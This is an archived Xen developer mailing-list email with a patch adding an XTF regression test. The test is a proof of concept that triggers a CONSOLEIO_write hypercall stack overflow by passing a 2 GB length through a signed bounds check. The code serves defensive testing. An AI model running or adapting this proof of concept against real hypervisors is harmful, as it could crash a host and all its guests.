From nobody Fri Mar 29 08:57:37 2024 Delivered-To: importer@patchew.org Authentication-Results: mx.zohomail.com; dkim=fail; spf=none (zohomail.com: 192.237.175.120 is neither permitted nor denied by domain of lists.xenproject.org) smtp.mailfrom=xen-devel-bounces@lists.xenproject.org; dmarc=fail(p=none dis=none) header.from=citrix.com ARC-Seal: i=1; a=rsa-sha256; t=1575038149; cv=none; d=zohomail.com; s=zohoarc; b=JOMl3XiTokSBgtXnaz/d8mqM+e3wWu28IXl0D+q/bcXRg9WQhTB6JH8zK+mAlrhBi8i6OMR7sfiOFGIXcuWonnahCA2I6NrWWp9hQa7NNsjfLWdVwVlc+IZW4z9Nkx/NjzcOKZwVcZUTrYPDrRPZT/MEFH/rr0uTt2oechcK7FA= ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=zohomail.com; s=zohoarc; t=1575038149; h=Content-Type:Content-Transfer-Encoding:Cc:Date:From:In-Reply-To:List-Subscribe:List-Post:List-Id:List-Help:List-Unsubscribe:MIME-Version:Message-ID:References:Sender:Subject:To; bh=Bahm8ksI8lY2dqanMZy+QjI5X2/BK1do2J/c2f+vBLA=; b=JUHWj5QiiDprXGDLJ9Rr3wj1UQeMwRWwL71J9EHINWKmdyofLtkKkpZtSw96LcNraCyIVOr6MBIL4khg3yJotFgpjUV9N4qbJ39ZWpGiBrnU/6XzuTlY/qRN41zZej8uUwocFONw2CrHBE5bzd47OvYYUOHd9zZldjRzO9Khfmc= ARC-Authentication-Results: i=1; mx.zohomail.com; dkim=fail; spf=none (zohomail.com: 192.237.175.120 is neither permitted nor denied by domain of lists.xenproject.org) smtp.mailfrom=xen-devel-bounces@lists.xenproject.org; dmarc=fail header.from= (p=none dis=none) header.from= Return-Path: Received: from lists.xenproject.org (lists.xenproject.org [192.237.175.120]) by mx.zohomail.com with SMTPS id 1575038149882725.0594999291171; Fri, 29 Nov 2019 06:35:49 -0800 (PST) Received: from localhost ([127.0.0.1] helo=lists.xenproject.org) by lists.xenproject.org with esmtp (Exim 4.89) (envelope-from ) id 1iahMa-0002pC-Tg; Fri, 29 Nov 2019 14:35:16 +0000 Received: from us1-rack-iad1.inumbo.com ([172.99.69.81]) by lists.xenproject.org with esmtp (Exim 4.89) (envelope-from ) id 1iahMZ-0002p2-Gi for xen-devel@lists.xenproject.org; Fri, 29 Nov 2019 14:35:15 +0000 Received: from esa5.hc3370-68.iphmx.com (unknown [216.71.155.168]) by us1-rack-iad1.inumbo.com (Halon) with ESMTPS id 74d5b59c-12b5-11ea-83b8-bc764e2007e4; Fri, 29 Nov 2019 14:35:15 +0000 (UTC) X-Inumbo-ID: 74d5b59c-12b5-11ea-83b8-bc764e2007e4 DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=citrix.com; s=securemail; t=1575038114; h=from:to:cc:subject:date:message-id:in-reply-to: references:mime-version; bh=RiH7jnaB3EiOtyjYOGj/CNHCoyixO+9rlHBMwVdVOOE=; b=dgLmUJRH4F3pSnsswoYO2+/fB+e0I604PZ7jM6xe5LtA8oK5DcRJoDDL oNNrE32vUNbASJ9wBeRZ09d6q2YYfgjFestJlZLV1KrKc/BlsooM1MxE5 LX0Sdo0uH9A/EIzMMHM22oT9If1z9qDZQ+TzrBsjOFrbZBnT5tLqWlNsH U=; Authentication-Results: esa5.hc3370-68.iphmx.com; dkim=none (message not signed) header.i=none; spf=None smtp.pra=andrew.cooper3@citrix.com; spf=Pass smtp.mailfrom=Andrew.Cooper3@citrix.com; spf=None smtp.helo=postmaster@mail.citrix.com Received-SPF: none (zohomail.com: 192.237.175.120 is neither permitted nor denied by domain of lists.xenproject.org) client-ip=192.237.175.120; envelope-from=xen-devel-bounces@lists.xenproject.org; helo=lists.xenproject.org; Received-SPF: None (esa5.hc3370-68.iphmx.com: no sender authenticity information available from domain of andrew.cooper3@citrix.com) identity=pra; client-ip=162.221.158.21; receiver=esa5.hc3370-68.iphmx.com; envelope-from="Andrew.Cooper3@citrix.com"; x-sender="andrew.cooper3@citrix.com"; x-conformance=sidf_compatible Received-SPF: Pass (esa5.hc3370-68.iphmx.com: domain of Andrew.Cooper3@citrix.com designates 162.221.158.21 as permitted sender) identity=mailfrom; client-ip=162.221.158.21; receiver=esa5.hc3370-68.iphmx.com; envelope-from="Andrew.Cooper3@citrix.com"; x-sender="Andrew.Cooper3@citrix.com"; x-conformance=sidf_compatible; x-record-type="v=spf1"; x-record-text="v=spf1 ip4:209.167.231.154 ip4:178.63.86.133 ip4:195.66.111.40/30 ip4:85.115.9.32/28 ip4:199.102.83.4 ip4:192.28.146.160 ip4:192.28.146.107 ip4:216.52.6.88 ip4:216.52.6.188 ip4:162.221.158.21 ip4:162.221.156.83 ip4:168.245.78.127 ~all" Received-SPF: None (esa5.hc3370-68.iphmx.com: no sender authenticity information available from domain of postmaster@mail.citrix.com) identity=helo; client-ip=162.221.158.21; receiver=esa5.hc3370-68.iphmx.com; envelope-from="Andrew.Cooper3@citrix.com"; x-sender="postmaster@mail.citrix.com"; x-conformance=sidf_compatible IronPort-SDR: 077PrDM3EXaVUUZbs0gmRCV4gMyugHQY8r7rRiV7LWIT+5c3slZAPWJdolZzz2vkDLHX7bGxbc H6T8Q6DubzuT0tUEGV2eZboL6zqEAjPV8fcc6hrcWU4qM2M9qkzWP8uPe2a+o3Hhby+WJ101bK qMLMBjI08BsRSv/scliVUKxc95ePOVixyMx/WuJr2L0WUmEVVeEno45JhuWNvWLGfsDf0Gn+Tt 3VKD4XzCmkP/bhseM6WpMmRDs3i4dBve67nl/OHnoIc4QHAbbTwJlk2VJvk8eCr2F15O/nxLzE m0c= X-SBRS: 2.7 X-MesageID: 9344533 X-Ironport-Server: esa5.hc3370-68.iphmx.com X-Remote-IP: 162.221.158.21 X-Policy: $RELAYED X-IronPort-AV: E=Sophos;i="5.69,257,1571716800"; d="scan'208";a="9344533" From: Andrew Cooper To: Date: Fri, 29 Nov 2019 14:35:09 +0000 Message-ID: <20191129143509.26528-1-andrew.cooper3@citrix.com> X-Mailer: git-send-email 2.11.0 In-Reply-To: <5766dd2b-2aa7-bafe-56ad-3ea33ddf4591@suse.com> References: <5766dd2b-2aa7-bafe-56ad-3ea33ddf4591@suse.com> MIME-Version: 1.0 Subject: [Xen-devel] [PATCH XTF] CONSOLEIO_write stack overflow PoC X-BeenThere: xen-devel@lists.xenproject.org X-Mailman-Version: 2.1.23 Precedence: list List-Id: Xen developer discussion List-Unsubscribe: , List-Post: List-Help: List-Subscribe: , Cc: Andrew Cooper Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable Errors-To: xen-devel-bounces@lists.xenproject.org Sender: "Xen-devel" X-ZohoMail-DKIM: fail (Header signature does not verify) Classify it as an XSA test (which arguably ought to be named 'security'), despite no XSA being issues. Signed-off-by: Andrew Cooper Reviewed-by: Jan Beulich --- docs/all-tests.dox | 2 ++ tests/xsa-consoleio-write/Makefile | 9 +++++ tests/xsa-consoleio-write/main.c | 69 ++++++++++++++++++++++++++++++++++= ++++ 3 files changed, 80 insertions(+) create mode 100644 tests/xsa-consoleio-write/Makefile create mode 100644 tests/xsa-consoleio-write/main.c diff --git a/docs/all-tests.dox b/docs/all-tests.dox index 50429127..bcf9b7ed 100644 --- a/docs/all-tests.dox +++ b/docs/all-tests.dox @@ -143,6 +143,8 @@ XSA-293 - See @ref test-pv-fsgsbase. @subpage test-xsa-298 - missing descriptor table limit checking in x86 PV emulation. =20 +@subpage test-xsa-consoleio-write - CONSOLEIO_write stack overflow + =20 @section index-utility Utilities =20 diff --git a/tests/xsa-consoleio-write/Makefile b/tests/xsa-consoleio-write= /Makefile new file mode 100644 index 00000000..d189b4de --- /dev/null +++ b/tests/xsa-consoleio-write/Makefile @@ -0,0 +1,9 @@ +include $(ROOT)/build/common.mk + +NAME :=3D xsa-consoleio-write +CATEGORY :=3D xsa +TEST-ENVS :=3D hvm32pae + +obj-perenv +=3D main.o + +include $(ROOT)/build/gen.mk diff --git a/tests/xsa-consoleio-write/main.c b/tests/xsa-consoleio-write/m= ain.c new file mode 100644 index 00000000..f10a6256 --- /dev/null +++ b/tests/xsa-consoleio-write/main.c @@ -0,0 +1,69 @@ +/** + * @file tests/xsa-consoleio-write/main.c + * @ref test-xsa-consoleio-write + * + * This issue was discovered before it made it into any released version of + * Xen. Therefore, no XSA or CVE was issued. + * + * A bugfix in Xen 4.13 altered CONSOLEIO_write to tolerate passing NUL + * characters intact, as this is a requirement for various TTY setups. + * + * A signed-ness issue with the length calculation lead to a case where Xen + * will copy between 2 and 4G of guest provided data into a 128 byte objec= t on + * the stack. + * + * @see tests/xsa-consoleio-write/main.c + */ +#include + +const char test_title[] =3D "CONSOLEIO_write stack overflow PoC"; + +uint8_t zero_page[PAGE_SIZE] __page_aligned_bss; + +/* Have the assembler build an L1/L2 pair mapping zero_page[] many times. = */ +asm (".section \".data.page_aligned\", \"aw\";" + ".align 4096;" + + "l1t:" + ".rept 512;" + ".long zero_page + "STR(PF_SYM(AD, P))", 0;" + ".endr;" + ".size l1t, . - l1t;" + ".type l1t, @object;" + + "l2t:" + ".rept 512;" + ".long l1t + "STR(PF_SYM(AD, P))", 0;" + ".endr;" + ".size l2t, . - l2t;" + ".type l2t, @object;" + + ".previous;" + ); +extern intpte_t l2t[512]; + +void test_main(void) +{ + /* Map 2G worth of zero_page[] starting from 1G... */ + pae_l3_identmap[1] =3D pae_l3_identmap[2] =3D pte_from_virt(l2t, PF_SY= M(AD, P)); + + /* + * ... , write those zeros with a length possible to be confused by a + * signed bounds check... + */ + hypercall_console_write(_p(GB(1)), 0x80000000); + + /* ... and if Xen is still alive, it didn't trample over its own stack= . */ + + xtf_success("Success: Not vulnerable to CONSOLEIO_write stack overflow= \n"); +} + +/* + * Local variables: + * mode: C + * c-file-style: "BSD" + * c-basic-offset: 4 + * tab-width: 4 + * indent-tabs-mode: nil + * End: + */ --=20 2.11.0 _______________________________________________ Xen-devel mailing list Xen-devel@lists.xenproject.org https://lists.xenproject.org/mailman/listinfo/xen-devel